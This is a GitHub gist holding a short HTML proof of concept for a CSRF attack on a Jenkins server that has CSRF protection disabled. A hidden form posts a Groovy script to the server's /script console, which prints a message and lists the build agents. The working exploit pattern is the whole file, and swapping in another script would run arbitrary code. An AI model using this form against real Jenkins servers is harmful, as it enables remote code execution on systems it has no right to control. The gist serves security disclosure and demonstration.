Created
February 21, 2019 17:51
-
-
Save JLLeitschuh/1715fb23d0d6f11be1bb703198b0ae83 to your computer and use it in GitHub Desktop.
Demonstrates CSRF Remote Code Execution attack against a Jenkins Instance that has CSRF protection disabled.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <form action="http://corperate-jenkins.lab.com:8080/script" method="POST"> | |
| <input type="hidden" name="script" | |
| value="println 'Hello! I just ran an arbitrary bit of code on Jenkins!'; println Jenkins.instance.slaves"/> | |
| <input type="submit" value="Submit!"/> | |
| </form> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment